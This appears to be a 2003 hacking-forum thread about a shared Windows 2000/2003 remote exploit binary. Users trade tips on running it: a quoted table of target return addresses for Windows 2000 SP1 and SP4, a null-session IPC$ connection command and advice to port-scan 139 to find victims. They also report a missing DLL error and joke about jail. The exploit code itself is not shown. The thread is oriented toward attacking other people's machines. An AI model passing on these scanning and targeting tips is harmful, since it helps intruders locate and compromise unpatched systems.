will test it on a german 2k3 os wink.gif let's see, don't expect it'll work wink.gif

€:
huh? huh.gif

---------------------------
o_wks3.exe - Komponente nicht gefunden
---------------------------
Die Anwendung konnte nicht gestartet werden, weil MSVCR71.dll nicht gefunden wurde. Neuinstallation der Anwendung könnte das Problem beheben.
---------------------------
OK
---------------------------
It says MSVCR71.dll is not present huh.gif
flame
it seems only russian sp3 and sp4 are available (considering that machines running fewer service packs than that are useless)
how come only russian get to have fun
and we dont ...
..:Z:..
sorry for my n00b question but how can i scan for this bug with a protscan "139" or how ?' thx for answers
//edit sorry for my bad english ^^
flame
QUOTE (..:Z:.. @ Dec 18 2003, 08:24 AM)
sorry for my n00b question but how can i scan for this bug with a protscan "139" or how ?' thx for answers
//edit sorry for my bad english ^^

there are several ways to scan this exploit
1. port scan port 139 - then try connecting to ipc$ (net use \\ip\ipc$ /u:"" p:"")
2. RETINA can scan for a specific exploit.
3. you answered your own question.
4. wtf
5. see you in jail guys
Thonyx
QUOTE

see you in jail guys


lol!!

Thx man for this sploit!
passi
flame: nice reply


thanks for the exploit !!!
101
QUOTE (flame @ Dec 18 2003, 02:47 AM)
it seems only russian sp3 and sp4 are available


targets[] = {
{
"Window 2000 (enGLISH) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (enGLISH) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"




smile.gif
WeeDMoNKeY
need anony login * [NB: win2k(on ntfs), by default, don't...] :< and who the (filtered) uses FAT system? noe one :< to bad, it wouldve prolly been good.
flame
QUOTE (101 @ Dec 18 2003, 10:35 PM)
QUOTE (flame @ Dec 18 2003, 02:47 AM)
it seems only russian sp3 and sp4 are available


targets[] = {
{
"Window 2000 (enGLISH) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (enGLISH) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"




smile.gif

tongue.gif
how could i miss that ?
guess i read it 2 fast - can anyone confirm that this works ?

and weedmonkey - i read a post of someone who confirmed that this exploit (not this specific one) works on NTFS machines although it said FAT - gotta test it to be sure though.
laugh.gif

ps. what is this XOR and how can it be changed ?
labbertasche
thx ... let's test




ahh the dll rolleyes.gif
flame
QUOTE (labbertasche @ Dec 19 2003, 04:52 PM)
thx ... let's test




ahh the dll rolleyes.gif

what DLL ?
passi
you need the dll to run the exploit.

does anyone have a scanner? a GOOD one?
EXPLOiTED
Guys... What port do I scan for to use this exploit? and what "DLL" is needed to use this?

//Edit
Nevermind... I'm guessing its port 139 judging from the prior post tongue.gif
101

you should scan port 53 & port 88 kerberos of course....